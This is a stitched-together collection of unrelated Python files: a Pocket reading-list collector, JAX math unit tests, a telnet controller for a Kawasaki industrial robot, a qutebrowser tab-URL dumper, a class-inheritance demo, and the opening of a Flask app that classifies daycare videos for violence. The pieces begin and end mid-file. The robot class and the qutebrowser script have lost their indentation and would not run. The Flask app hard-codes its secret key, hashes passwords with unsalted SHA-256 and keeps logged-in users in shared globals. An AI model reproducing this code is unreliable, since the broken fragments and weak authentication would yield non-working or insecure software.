            retrieve="https://getpocket.com/v3/get",
        )
    def get_api_secrets(self):
        """Load the Pocket app secrets JSON; log and re-raise on bad JSON."""
        try:
            api_secrets = json.load(open(self.api_secrets_file))
        except ValueError:
            logger.error("Cannot read the API secrets for Pocket in %s." % self.api_secrets_file)
            raise
        else:
            return api_secrets
    def initial_parameters(self, **kwargs):
        """ If we are not refreshing we ask pocket only from the time of last element """
        result = super(PocketCollector, self).initial_parameters(
            **kwargs
        )
        if not self.refresh_duplicates:
            # Resume from the newest timestamp already stored for this type.
            max_timestamp = self.db.max_timestamp(type=self.type)
            result.update(dict(max_timestamp=max_timestamp))
        return result
    def run(self, **params):
        """Page through archived Pocket items and upsert them into the db.

        Pages `chunk_size` items at a time (newest first); stops at the
        first known duplicate unless refresh_duplicates is set, otherwise
        keeps going until a short (final) chunk is returned.
        """
        refresh_duplicates = self.refresh_duplicates
        # tried to use the Google OAuth implementation, but:
        # * Pocket does not support GET requests
        # * The Flow is quite not standard
        last_timestamp = params.get('max_timestamp')
        chunk_size = 5
        credentials = self.authenticate()
        endpoints = self.get_endpoints()
        query = dict(
            consumer_key=credentials['consumer_key'],
            access_token=credentials['authentication_token'],
            state="archive",
            sort="newest",
            detailType="complete",
            count=chunk_size,
        )
        if last_timestamp:
            # Pocket's "since" filter takes epoch seconds.
            query['since'] = get_epoch_from_timestamp(last_timestamp)
        start_from = 0
        count = 0       # items actually added/updated
        processed = 0   # items seen (including duplicates)
        while True:
            query['offset'] = start_from
            # logger.debug("Asking chunk %d-%d" % (start_from, start_from + chunk_size))
            response = session.post(
                endpoints['retrieve'],
                headers={"X-Accept": "application/json"},
                data=query
            )
            if response.status_code != 200:
                raise Exception("Error getting list of items from Pocket")
            data = response.json()
            returned_elements = len(data['list'])
            # logger.debug("Pocket query returned %d elements" % returned_elements)
            if data['list']:
                for item_id, e in data['list'].items():
                    # there are other times eventually:
                    # "time_added", "time_updated", "time_read", "time_favorited"
                    # get the images & video sources, preserving the order
                    images = [e['images'][imgid]['src']
                              for imgid in sorted(list(e.get('images', {}).keys()))
                              ]
                    videos = [e['videos'][imgid]['src']
                              for imgid in sorted(list(e.get('videos', {}).keys()))
                              ]
                    title = e['resolved_title']
                    item = dict(
                        id=item_id,
                        type=self.type,
                        url=e['resolved_url'],
                        timestamp=parse_datetime(get_timestamp_from_epoch(e['time_updated'])),
                        timestamp_added=parse_datetime(get_timestamp_from_epoch(e['time_added'])),
                        title=title,
                        tags=list(e.get('tags', {}).keys()),
                        images=images,
                        videos=videos,
                        excerpt=e['excerpt'],
                    )
                    try:
                        processed += 1
                        self.db.upsert(item,
                                       update=refresh_duplicates)
                        logger.info("{type} - {title} ({id})".format(type=self.type,
                                                                     title=title, id=item_id))
                        count += 1
                    except DuplicateFound:
                        # Known item: when not refreshing, everything older
                        # is already stored, so stop the whole run.
                        if not refresh_duplicates:
                            logger.debug(
                                "We already know this one. Stopping after %d added." % count)
                            return
            if returned_elements < chunk_size:
                # Short chunk means this was the last page.
                break
            start_from += chunk_size
        logger.debug("Runner finished, after %d added, %d updated" % (count, processed))
def parse_datetime(timestamp):
    """Parse the collector's canonical "...+00:00Z" timestamp string back
    into a (naive) datetime — the inverse of get_timestamp_from_epoch."""
    canonical_format = '%Y-%m-%dT%H:%M:%S+00:00Z'
    return datetime.datetime.strptime(timestamp, canonical_format)
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Unit tests for math."""
import functools
from absl.testing import absltest
import jax
from jax import random
from jax import test_util as jtu
import jax.numpy as jnp
import numpy as np
import scipy as sp
import tensorflow as tf
from internal import math
def safe_trig_harness(fn, max_exp):
    """Evaluate np.<fn> and math.safe_<fn> on a symmetric log-spaced grid.

    The grid spans magnitudes 10^-30 .. 10^max_exp on both sides of zero
    (zero included). Returns (y_true, y) for comparison.
    """
    magnitudes = 10**np.linspace(-30, max_exp, 10000)
    x = np.concatenate([-magnitudes[::-1], np.array([0]), magnitudes])
    reference = getattr(np, fn)(x)
    actual = getattr(math, 'safe_' + fn)(x)
    return reference, actual
class MathUtilsTest(jtu.JaxTestCase):
    """Tests for internal.math: safe trig, PSNR/MSE, learning-rate decay,
    SSIM, sRGB conversion, and sorted piecewise-constant PDF sampling."""
    def test_sin(self):
        """In [-1e10, 1e10] safe_sin and safe_cos are accurate."""
        for fn in ['sin', 'cos']:
            y_true, y = safe_trig_harness(fn, 10)
            self.assertLess(np.max(np.abs(y - y_true)), 1e-4)
            self.assertFalse(jnp.any(jnp.isnan(y)))
        # Beyond that range it's less accurate but we just don't want it to be NaN.
        for fn in ['sin', 'cos']:
            y_true, y = safe_trig_harness(fn, 60)
            self.assertFalse(jnp.any(jnp.isnan(y)))
    def test_psnr_round_trip(self):
        """MSE -> PSNR -> MSE is a no-op."""
        mse = 0.07
        self.assertAllClose(math.psnr_to_mse(math.mse_to_psnr(mse)), mse)
    def test_learning_rate_decay(self):
        """Exponential LR decay hits its endpoints and geometric midpoint."""
        np.random.seed(0)
        for _ in range(10):
            # Random (init, final, duration) configurations.
            lr_init = np.exp(np.random.normal() - 3)
            lr_final = lr_init * np.exp(np.random.normal() - 5)
            max_steps = int(np.ceil(100 + 100 * np.exp(np.random.normal())))
            lr_fn = functools.partial(
                math.learning_rate_decay,
                lr_init=lr_init,
                lr_final=lr_final,
                max_steps=max_steps)
            # Test that the rate at the beginning is the initial rate.
            self.assertAllClose(lr_fn(0), lr_init)
            # Test that the rate at the end is the final rate.
            self.assertAllClose(lr_fn(max_steps), lr_final)
            # Test that the rate at the middle is the geometric mean of the two rates.
            self.assertAllClose(lr_fn(max_steps / 2), np.sqrt(lr_init * lr_final))
            # Test that the rate past the end is the final rate.
            self.assertAllClose(lr_fn(max_steps + 100), lr_final)
    def test_delayed_learning_rate_decay(self):
        """Same as above but with a delayed warmup (lr_delay_steps/mult)."""
        np.random.seed(0)
        for _ in range(10):
            lr_init = np.exp(np.random.normal() - 3)
            lr_final = lr_init * np.exp(np.random.normal() - 5)
            max_steps = int(np.ceil(100 + 100 * np.exp(np.random.normal())))
            lr_delay_steps = int(np.random.uniform(low=0.1, high=0.4) * max_steps)
            lr_delay_mult = np.exp(np.random.normal() - 3)
            lr_fn = functools.partial(
                math.learning_rate_decay,
                lr_init=lr_init,
                lr_final=lr_final,
                max_steps=max_steps,
                lr_delay_steps=lr_delay_steps,
                lr_delay_mult=lr_delay_mult)
            # Test that the rate at the beginning is the delayed initial rate.
            self.assertAllClose(lr_fn(0), lr_delay_mult * lr_init)
            # Test that the rate at the end is the final rate.
            self.assertAllClose(lr_fn(max_steps), lr_final)
            # Test that the rate after the delay is over is the usual rate.
            self.assertAllClose(
                lr_fn(lr_delay_steps),
                math.learning_rate_decay(lr_delay_steps, lr_init, lr_final,
                                         max_steps))
            # Test that the rate at the middle is the geometric mean of the two rates.
            self.assertAllClose(lr_fn(max_steps / 2), np.sqrt(lr_init * lr_final))
            # Test that the rate past the end is the final rate.
            self.assertAllClose(lr_fn(max_steps + 100), lr_final)
    def test_ssim_golden(self):
        """Test our SSIM implementation against the Tensorflow version."""
        rng = random.PRNGKey(0)
        shape = (2, 12, 12, 3)
        for _ in range(4):
            # Random image pair and random SSIM hyper-parameters.
            rng, key = random.split(rng)
            max_val = random.uniform(key, minval=0.1, maxval=3.)
            rng, key = random.split(rng)
            img0 = max_val * random.uniform(key, shape=shape, minval=-1, maxval=1)
            rng, key = random.split(rng)
            img1 = max_val * random.uniform(key, shape=shape, minval=-1, maxval=1)
            rng, key = random.split(rng)
            filter_size = random.randint(key, shape=(), minval=1, maxval=10)
            rng, key = random.split(rng)
            filter_sigma = random.uniform(key, shape=(), minval=0.1, maxval=10.)
            rng, key = random.split(rng)
            k1 = random.uniform(key, shape=(), minval=0.001, maxval=0.1)
            rng, key = random.split(rng)
            k2 = random.uniform(key, shape=(), minval=0.001, maxval=0.1)
            # Reference value from TensorFlow's SSIM.
            ssim_gt = tf.image.ssim(
                img0,
                img1,
                max_val,
                filter_size=filter_size,
                filter_sigma=filter_sigma,
                k1=k1,
                k2=k2).numpy()
            for return_map in [False, True]:
                ssim_fn = jax.jit(
                    functools.partial(
                        math.compute_ssim,
                        max_val=max_val,
                        filter_size=filter_size,
                        filter_sigma=filter_sigma,
                        k1=k1,
                        k2=k2,
                        return_map=return_map))
                ssim = ssim_fn(img0, img1)
                if not return_map:
                    self.assertAllClose(ssim, ssim_gt)
                else:
                    # The per-pixel map averages back to the scalar SSIM.
                    self.assertAllClose(np.mean(ssim, [1, 2, 3]), ssim_gt)
                self.assertLessEqual(np.max(ssim), 1.)
                self.assertGreaterEqual(np.min(ssim), -1.)
    def test_ssim_lowerbound(self):
        """Test the unusual corner case where SSIM is -1."""
        sz = 11
        img = np.meshgrid(*([np.linspace(-1, 1, sz)] * 2))[0][None, ..., None]
        eps = 1e-5
        ssim = math.compute_ssim(
            img, -img, 1., filter_size=sz, filter_sigma=1.5, k1=eps, k2=eps)
        self.assertAllClose(ssim, -np.ones_like(ssim))
    def test_srgb_linearize(self):
        """sRGB <-> linear conversions round-trip with finite gradients."""
        x = np.linspace(-1, 3, 10000)  # Nobody should call this <0 but it works.
        # Check that the round-trip transformation is a no-op.
        self.assertAllClose(math.linear_to_srgb(math.srgb_to_linear(x)), x)
        self.assertAllClose(math.srgb_to_linear(math.linear_to_srgb(x)), x)
        # Check that gradients are finite.
        self.assertTrue(
            np.all(np.isfinite(jax.vmap(jax.grad(math.linear_to_srgb))(x))))
        self.assertTrue(
            np.all(np.isfinite(jax.vmap(jax.grad(math.srgb_to_linear))(x))))
    def test_sorted_piecewise_constant_pdf_train_mode(self):
        """Test that piecewise-constant sampling reproduces its distribution."""
        batch_size = 4
        num_bins = 16
        num_samples = 1000000
        precision = 1e5
        rng = random.PRNGKey(20202020)
        # Generate a series of random PDFs to sample from.
        data = []
        for _ in range(batch_size):
            rng, key = random.split(rng)
            # Randomly initialize the distances between bins.
            # We're rolling our own fixed precision here to make cumsum exact.
            bins_delta = jnp.round(precision * jnp.exp(
                random.uniform(key, shape=(num_bins + 1,), minval=-3, maxval=3)))
            # Set some of the bin distances to 0.
            rng, key = random.split(rng)
            bins_delta *= random.uniform(key, shape=bins_delta.shape) < 0.9
            # Integrate the bins.
            bins = jnp.cumsum(bins_delta) / precision
            rng, key = random.split(rng)
            bins += random.normal(key) * num_bins / 2
            rng, key = random.split(rng)
            # Randomly generate weights, allowing some to be zero.
            weights = jnp.maximum(
                0, random.uniform(key, shape=(num_bins,), minval=-0.5, maxval=1.))
            gt_hist = weights / weights.sum()
            data.append((bins, weights, gt_hist))
        # Tack on an "all zeros" weight matrix, which is a common cause of NaNs.
        weights = jnp.zeros_like(weights)
        gt_hist = jnp.ones_like(gt_hist) / num_bins
        data.append((bins, weights, gt_hist))
        bins, weights, gt_hist = [jnp.stack(x) for x in zip(*data)]
        for randomized in [True, False]:
            rng, key = random.split(rng)
            # Draw samples from the batch of PDFs.
            samples = math.sorted_piecewise_constant_pdf(
                key,
                bins,
                weights,
                num_samples,
                randomized,
            )
            self.assertEqual(samples.shape[-1], num_samples)
            # Check that samples are sorted.
            self.assertTrue(jnp.all(samples[..., 1:] >= samples[..., :-1]))
            # Verify that each set of samples resembles the target distribution.
            for i_samples, i_bins, i_gt_hist in zip(samples, bins, gt_hist):
                i_hist = jnp.float32(jnp.histogram(i_samples, i_bins)[0]) / num_samples
                i_gt_hist = jnp.array(i_gt_hist)
                # Merge any of the zero-span bins until there aren't any left.
                while jnp.any(i_bins[:-1] == i_bins[1:]):
                    j = int(jnp.where(i_bins[:-1] == i_bins[1:])[0][0])
                    i_hist = jnp.concatenate([
                        i_hist[:j],
                        jnp.array([i_hist[j] + i_hist[j + 1]]), i_hist[j + 2:]
                    ])
                    i_gt_hist = jnp.concatenate([
                        i_gt_hist[:j],
                        jnp.array([i_gt_hist[j] + i_gt_hist[j + 1]]), i_gt_hist[j + 2:]
                    ])
                    i_bins = jnp.concatenate([i_bins[:j], i_bins[j + 1:]])
                # Angle between the two histograms in degrees.
                angle = 180 / jnp.pi * jnp.arccos(
                    jnp.minimum(
                        1.,
                        jnp.mean(
                            (i_hist * i_gt_hist) /
                            jnp.sqrt(jnp.mean(i_hist**2) * jnp.mean(i_gt_hist**2)))))
                # Jensen-Shannon divergence.
                m = (i_hist + i_gt_hist) / 2
                js_div = jnp.sum(
                    sp.special.kl_div(i_hist, m) + sp.special.kl_div(i_gt_hist, m)) / 2
                self.assertLessEqual(angle, 0.5)
                self.assertLessEqual(js_div, 1e-5)
    def test_sorted_piecewise_constant_pdf_large_flat(self):
        """Test sampling when given a large flat distribution."""
        num_samples = 100
        num_bins = 100000
        key = random.PRNGKey(0)
        bins = jnp.arange(num_bins)
        weights = np.ones(len(bins) - 1)
        samples = math.sorted_piecewise_constant_pdf(
            key,
            bins[None],
            weights[None],
            num_samples,
            True,
        )[0]
        # All samples should be within the range of the bins.
        self.assertTrue(jnp.all(samples >= bins[0]))
        self.assertTrue(jnp.all(samples <= bins[-1]))
        # Samples modded by their bin index should resemble a uniform distribution.
        samples_mod = jnp.mod(samples, 1)
        self.assertLessEqual(
            sp.stats.kstest(samples_mod, 'uniform', (0, 1)).statistic, 0.2)
        # All samples should collectively resemble a uniform distribution.
        self.assertLessEqual(
            sp.stats.kstest(samples, 'uniform', (bins[0], bins[-1])).statistic, 0.2)
    def test_sorted_piecewise_constant_pdf_sparse_delta(self):
        """Test sampling when given a large distribution with a big delta in it."""
        num_samples = 100
        num_bins = 100000
        key = random.PRNGKey(0)
        bins = jnp.arange(num_bins)
        weights = np.ones(len(bins) - 1)
        delta_idx = len(weights) // 2
        # One bin carries as much mass as all the others combined.
        weights[delta_idx] = len(weights) - 1
        samples = math.sorted_piecewise_constant_pdf(
            key,
            bins[None],
            weights[None],
            num_samples,
            True,
        )[0]
        # All samples should be within the range of the bins.
        self.assertTrue(jnp.all(samples >= bins[0]))
        self.assertTrue(jnp.all(samples <= bins[-1]))
        # Samples modded by their bin index should resemble a uniform distribution.
        samples_mod = jnp.mod(samples, 1)
        self.assertLessEqual(
            sp.stats.kstest(samples_mod, 'uniform', (0, 1)).statistic, 0.2)
        # The delta function bin should contain ~half of the samples.
        in_delta = (samples >= bins[delta_idx]) & (samples <= bins[delta_idx + 1])
        self.assertAllClose(jnp.mean(in_delta), 0.5, atol=0.05)
    def test_sorted_piecewise_constant_pdf_single_bin(self):
        """Test sampling when given a small `one hot' distribution."""
        num_samples = 625
        key = random.PRNGKey(0)
        bins = jnp.array([0, 1, 3, 6, 10], jnp.float32)
        for randomized in [False, True]:
            for i in range(len(bins) - 1):
                # Put all the mass in bin i.
                weights = np.zeros(len(bins) - 1, jnp.float32)
                weights[i] = 1.
                samples = math.sorted_piecewise_constant_pdf(
                    key,
                    bins[None],
                    weights[None],
                    num_samples,
                    randomized,
                )[0]
                # All samples should be within [bins[i], bins[i+1]].
                self.assertTrue(jnp.all(samples >= bins[i]))
                self.assertTrue(jnp.all(samples <= bins[i + 1]))
if __name__ == '__main__':
    # Run the absl test suite with JAX's test loader.
    absltest.main(testLoader=jtu.JaxTestLoader())
|
from telnetlib import IAC, DO, WILL, SB, SE, TTYPE, ECHO, DONT, WONT, NAOFFD
import telnetlib
import socket
import time
import threading
import os
import matlab.engine
def clear_all():
    """Clears all the variables from the workspace of the spyder application.

    Deletes every module-level name except underscore-prefixed names and
    anything whose repr mentions 'func' or 'module' (functions/imports are
    kept). Operates on THIS module's globals only.
    """
    # Iterate over a snapshot so deleting from globals() mid-loop is safe.
    gl = globals().copy()
    for var in gl:
        if var[0] == '_': continue  # keep private/dunder names
        if 'func' in str(globals()[var]): continue  # keep functions
        if 'module' in str(globals()[var]): continue  # keep imported modules
        del globals()[var]
class Kawasaki:
"""
Python interface to connect, initite, and control progrmas for Kawasaki
Robotics. File X6 was originally recieved form James Hudak, Mechatronics
Lab assitant for Kennesaw State University, if number folling the 'x'
changes it simply reflects modified version.
*TCP port 23 uses the Transmission Control Protocol. TCP is one of the main
protocols in TCP/IP networks. Whereas the IP protocol deals only with
packets, TCP enables two hosts to establish a connection and exchange
streams of data. TCP guarantees delivery of data and also guarantees that
packets will be delivered on port 23 in the same order in which they were
sent. Guaranteed communication over port 23 is the key difference between
TCP and UDP. UDP port 23 would not have guaranteed communication in the
same way as TCP.
"""
def __init__(self, hostIp='192.168.0.30', port=23): # Defines a local IP address connecting to Robot, Port is set to 23 as it is the TCP/IP communications on PC, was recommended to use 10300?
self.BUFFER_SIZE = 512 # bytes # seconds # No robot movement should take more than 60 seconds
self.sock = None
self.sockjnts = None
self.hostIp = hostIp #
self.port = port
self.env_term = 'VT100'
self.user = "as"
self.telnet = telnetlib.Telnet()
#self.connect()
def telnet_process_options(self, socket, cmd, opt):
IS = b'\00'
if cmd == WILL and opt == ECHO: # hex:ff fb 01 name:IAC WILL ECHO description:(I will echo)
socket.sendall(IAC + DO + opt) # hex(ff fd 01), name(IAC DO ECHO), descr(please use echo)
elif cmd == DO and opt == TTYPE: # hex(ff fd 18), name(IAC DO TTYPE), descr(please send environment type)
socket.sendall(IAC + WILL + TTYPE) # hex(ff fb 18), name(IAC WILL TTYPE), descr(Dont worry, i'll send environment type)
elif cmd == SB:
socket.sendall(IAC + SB + TTYPE + IS + self.env_term.encode() + IS + IAC + SE)
# hex(ff fa 18 00 b"VT100" 00 ff f0) name(IAC SB TTYPE iS VT100 IS IAC SE) descr(Start subnegotiation, environment type is VT100, end negotation)
elif cmd == SE: # server letting us know sub negotiation has ended
pass # do nothing
else: print('Unexpected telnet negotiation')
def connect(self):
print(f'>Connecting to robot, IPv4:{self.hostIp}, port:{self.port}')
self.telnet.set_option_negotiation_callback(self.telnet_process_options)
self.telnet.open(self.hostIp, self.port, 1)
time.sleep(0.5) #Allow TELNET negotaion to finish
self.telnet.read_until(b"n: ")
self.telnet.write(self.user.encode() + b"\r\n")
self.telnet.read_until(b">")
print('>Connected succesfully\n')
def disconnect(self):
#Wrote this a bit different
print("Disconnecting")
command = b"signal(-2010)\r\n"
self.telnet.write(command)
#time.sleep(1)
print(self.telnet.read_until(b">").decode())
self.telnet.close()
def load_as_file(self, file_location='master.as'):
max_chars = 492 # Max amount of characters that can be accepted per write to kawa.
if file_location != None:
print('>Transfering {} to kawasaki'.format(file_location))
inputfile = open(file_location, 'r')
file_text = inputfile.read() # Store Kawasaki-as code from file in local varianle
text_split = [file_text[i:i+max_chars] for i in range(0, len(file_text), max_chars)] # Split AS code in sendable blocks
print(f'>File consists of {len(file_text)} characters')
self.telnet.write(b"load master.as\r\n")##########################
self.telnet.read_until(b".as").decode("ascii")
self.telnet.write(b"\x02A 0\x17")
self.telnet.read_until(b"\x17")
print('>Sending file.... maybe....')
for i in range(0, len(text_split), 1):
self.telnet.write(b"\x02C 0" + text_split[i].encode() + b"\x17")
self.telnet.read_until(b"\x17")
print('>Loaded {} of {}'.format(i+1,len(text_split)))
self.telnet.write(b"\x02" + b"C 0" + b"\x1a\x17")
self.telnet.write(b"\r\n")
self.telnet.read_until(b"E\x17")
self.telnet.write(b"\x02" + b"E 0" + b"\x17")
#Read until command prompt and continue
self.telnet.read_until(b">")
print(".... Done, great success!\n -Borat\n")
else: print('No file specified\n') #Lastknown check, was built and sent to robot#still True [yes] [no]
def abort_kill_all(self):
for command in ["pcabort "]:
for i in range(1, 6):
prog_number = str(i) + ":"
self.telnet.write(command.encode() + prog_number.encode() + b"\r\n")
self.telnet.read_until(b">")
for command in ["abort ", "pckill\r\n1", "kill\r\n1"]:
self.telnet.write(command.encode() + b"\r\n")
self.telnet.read_until(b">")
def kawa_callback(self,strCmd='0 0 0 0 0 0'):
command=b'exe master\r\n' #Runs pg goat
self.telnet.write(command)
print(self.telnet.read_until(b'xyzoats').decode('ascii'))
command=strCmd.encode() + b"\r\n"
self.telnet.write(command)
print(self.telnet.read_until(b'>').decode('ascii'))
def initiate_move(self,strCmd='0 0 0 0 0 0'):
self.motor_power_on()
#time.sleep(5)
command=b'exe master\r\n'
self.telnet.write(command)
print(self.telnet.read_until(b'xyzoats').decode('ascii'))
command=strCmd.encode() + b"\r\n"
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
self.motor_power_off()
def motor_power_on(self): #kept this to power robot motors
command = b"zpow on\r\n"
self.telnet.write(command)
self.telnet.read_until(b">")
def motor_power_off(self):
command = b"zpow off\r\n"
self.telnet.write(command)
self.telnet.read_until(b">")
def reset_error(self): #Rest error
command = b'ereset\r\n'
self.telnet.write(command)
self.telnet.read_until(b">").decode("ascii")
def asCmd(self,command=None):
command=command.encode() + b'\r\n'
self.telnet.write(command)
self.telnet.read_until(b'>')
def clampExtend(self):
self.motor_power_on()
#time.sleep(1)
command=b'exe Klampe\r\n' #Runs pg goat
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
#time.sleep(1)
#self.motor_power_off()
def clampRetract(self):
    """Run the 'Klampr' program to retract the pneumatic clamp."""
    self.motor_power_on()
    self.telnet.write(b'exe Klampr\r\n')
    # Wait for the controller to report the program finished.
    self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
    self.asCmd('esc')
def MasterPart1(self, strCmd='0 0 0 0 0 0'):
    """Power motors on and run 'redhot' with the given pose command.

    Motors are intentionally left on afterwards (power-off is commented
    out); MasterPart2 completes the motion sequence.
    """
    self.motor_power_on()
    #time.sleep(5)
    command=b'exe redhot\r\n' #Runs pg goat
    self.telnet.write(command)
    # Wait for the program's 'xyzoats' input prompt.
    self.telnet.read_until(b'xyzoats').decode('ascii')
    command=strCmd.encode() + b"\r\n"
    self.telnet.write(command)
    # Block until the controller reports the program finished.
    self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
    self.asCmd('esc')
    #self.motor_power_off()
def MasterPart2(self):
    """Clear any error and run 'RHCP' to finish/return the motion."""
    self.reset_error()
    command=b'exe RHCP\r\n' #Runs pg goat
    self.telnet.write(command)
    # Block until the controller reports the program finished.
    self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
    self.asCmd('esc')
if __name__ == "__main__":
    # Main shot loop: MATLAB drives the stepper/ballscrew and computes the
    # pose; the Kawasaki robot clamps, draws back, and shoots.
    looper=True
    eng=matlab.engine.start_matlab()
    FS30L = Kawasaki()
    while(looper==True):#start the loop!
        FS30L.connect()
        FS30L.reset_error()
        FS30L.abort_kill_all()
        #time.sleep(1)
        #startErrup=input('Start Matlab compute? Will put Ballscrew in home Pose: (y/n): ')#warn about first move
        #if startErrup=='n':
        #    looper=False
        #    break#will break loop if 'she wasnt ready'
        #    # -Kevin Heart
        #    #https://www.youtube.com/watch?v=8Y5_Kuw1tXM
        #else:
        #retracts clamp to ensure clamp is put of the way, time delay added in function call
        #this will turn on motor power and stay on as robot is actively looking for a shot
        #and can trigger at any minute
        #######NEED A GO HOME POSE TO OFFICIALLY RESET
        FS30L.clampRetract()
        #Calls matlab which uses arduino toolbox to generate a PWMDutyCylse until limit switch
        #at front is triggered
        eng.Stepper2Front(nargout=0)
        #Once it has gone all the way forward pneumatic will extened allowing it to be cought, Delay added in function
        FS30L.connect()
        FS30L.reset_error()
        FS30L.abort_kill_all()
        FS30L.clampExtend()
        FS30L.motor_power_off()
        #starts matlabs main file to compute everything
        #this also saves a global variable of drawback distance which can be accessed in Stepper2Back()
        strCmd=eng.ClusterFuck(nargout=1)
        eng.Stepper2Back(nargout=0)
        FS30L.connect()
        FS30L.reset_error()
        FS30L.abort_kill_all()
        #a double check so robot does not go to position undesired
        #startErrup2=input('Continue? (y/n): ')
        #if startErrup2=='y':
        print(f'Sending "{strCmd}" to Robot')
        FS30L.MasterPart1(strCmd)
        time.sleep(2)
        FS30L.connect()
        FS30L.reset_error()
        FS30L.abort_kill_all()
        time.sleep(2)
        #One more input, this is where image servoing would take place
        # shoot=input('SHOOOOOOOOOOOOOOT!!!!!!!!!!!')
        #time.sleep(1)
        FS30L.clampRetract()
        FS30L.connect()
        FS30L.reset_error()
        FS30L.abort_kill_all()
        #finish moves back Home
        FS30L.MasterPart2()
        FS30L.motor_power_off()
        #else:
        #    looper=False
#!/usr/bin/env python
import os
import yaml
try:
from qutebrowser import qutebrowser, app
from qutebrowser.misc import ipc
except ImportError:
print("error: qutebrowser missing.")
exit(1)
def session_save():
    """Ask the running qutebrowser (via its IPC socket) to save the
    current session under the name 'get_urls'."""
    args = qutebrowser.get_argparser().parse_args()
    app.standarddir.init(args)
    ipc.send_to_running_instance(
        ipc._get_socketname(args.basedir),
        [":session-save get_urls"],
        args.target,
    )
# Trigger a session save, then read the resulting YAML and print the URL
# and title of every tab in every window.
session_save()
home = os.environ.get("HOME")
session = os.path.join(home, ".local/share/qutebrowser/sessions/get_urls.yml")
with open(session) as f:
    y = yaml.load(f.read(), Loader=yaml.BaseLoader)
# NOTE(review): looks like leftover debug output — prints only the first
# history entry of window 0 / tab 1. Confirm before removing.
print(y["windows"][0]["tabs"][1]["history"][0]["url"])
for win in y["windows"]:
    for tab in win["tabs"]:
        # history[0] is the first recorded entry for the tab — presumably
        # the intent; verify whether the *last* (current) entry was meant.
        url = tab["history"][0]["url"]
        title = tab["history"][0]["title"]
        if url.startswith("data:"):
            # data: URLs are huge; recover the real URL from the title text.
            url = title.split()[-1]
            title = url
        print(url, title)
|
class A:
    """Demo base class for the multiple-inheritance example below."""
    def afun(self):
        """Print an identifying message."""
        print(" I am A class Function")
class B:
    """Second demo base class for the multiple-inheritance example."""
    def bfun(self):
        """Print an identifying message."""
        print(" I am B class Function")
class C(A,B):
    """Inherits from both A and B, so instances expose afun, bfun, cfun."""
    def cfun(self):
        """Print an identifying message."""
        print(" I am C class Function")
#---------------------------------
# Demonstration: a C instance can call members inherited from A and B.
c1 = C()
# by using c1 we can call C,A,B class Members
c1.afun()
c1.bfun()
c1.cfun()
#-------------------------
b1 = B()
# by using b1 we can call B class Members only
# b1.afun() Error
b1.bfun()
|
from theanify import Theanifiable, theanify
|
import os
import time
import shutil
import json
import hashlib
import datetime
import numpy as np
import torch
import torch.optim
import torch.utils.data
from model import add_video_db, add_report_db, Video, ReportList, DaycareCenter, Location, User
from flask_sqlalchemy import SQLAlchemy
from flask_ngrok import run_with_ngrok
from flask import Flask, url_for, redirect, render_template, request, flash
from dl_model import load_model, data_loader
from data.data_reader import read_video
# Status codes stored on Video rows (DB stores them as strings).
video_status = {'need_check':'0', 'reported':'1', 'safe':'2'}
# Pretrained violence-detection checkpoint on the shared drive.
model_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Test Data/호준/호준model_best.E_bi_max_pool_ALL_fold_0_t2021-08-27 01:04:46.tar'
# Hyper-parameters / eval settings passed to load_model and data_loader.
args = {
    'arch': 'E_bi_max_pool',
    'workers':1,
    'batch-size':1,
    'evalmodel':model_path,
    'kfold':0,
    'split':5,
    'frames':5,
    'lr':1e-6,
    'weight_decay':1e-1
}
model = load_model(args,model_path)
daycare_center_name = '예은어린이집'
# Score (%) thresholds: above violence -> auto-report, above uncertain -> flag.
violence_threshold = 90
uncertain_threshold = 80
# Output directories for saved/classified video files.
save_video_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Web/static/saved video/'
save_violence_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Web/static/violence/'
save_uncertain_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Web/static/uncertain/'
app = Flask(__name__,static_folder='static',template_folder='templates')
# NOTE(review): hard-coded secret key is fine for a demo only.
app.secret_key = 'super secret key'
app.config['SESSION_TYPE'] = 'filesystem'
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///child_abuse_detection_database.db'
db = SQLAlchemy(app)
run_with_ngrok(app) #starts ngrok when the app is run
def get_hashed_password(password):
    """Return the SHA-256 hex digest of *password*.

    Encodes with UTF-8: the previous 'ascii' encoding raised
    UnicodeEncodeError for any non-ASCII password (e.g. Korean text),
    which this Korean-language site can reasonably expect.
    """
    h = hashlib.sha256()
    h.update(password.encode('utf-8'))
    return h.hexdigest()
def check_email(email):
    """Return True when a user with *email* already exists in the DB."""
    return bool(User.query.filter_by(email=email).all())
def convert_datetime(unixtime):
    """Convert unixtime to a 'YYYY-mm-dd HH_MM_SS' local-time string."""
    return datetime.datetime.fromtimestamp(unixtime).strftime('%Y-%m-%d %H_%M_%S')
def convert_unixtime(date_time):
    """Convert a 'YYYY-mm-dd HH_MM_SS' local-time string to unixtime."""
    parsed = datetime.datetime.strptime(date_time, '%Y-%m-%d %H_%M_%S')
    return parsed.timestamp()
def check_login(email, pw):
    """Look up a user by (email, hashed pw).

    Returns (found, user_id, location_id); (False, None, None) on miss.
    """
    matches = User.query.filter_by(email=email, pw=pw).all()
    if not matches:
        return (False, None, None)
    return (True, matches[0].id, matches[0].loc_id)
@app.route('/index')
@app.route('/')
def home():
    """Landing/login page."""
    return render_template('index.html')
# Module-level "session" state: id and loc_id of the logged-in user.
# NOTE(review): shared across all requests/clients — a per-client Flask
# session should replace this; confirm single-user deployment.
current_user = None
current_location = None
@app.route('/main',methods=['GET','POST'])
def maain():
    """Main page: GET renders it directly; POST validates login first."""
    global current_user, current_location
    if request.method == 'GET':
        return render_template('main.html')
    email = request.form['email']
    password = get_hashed_password(request.form['password'])
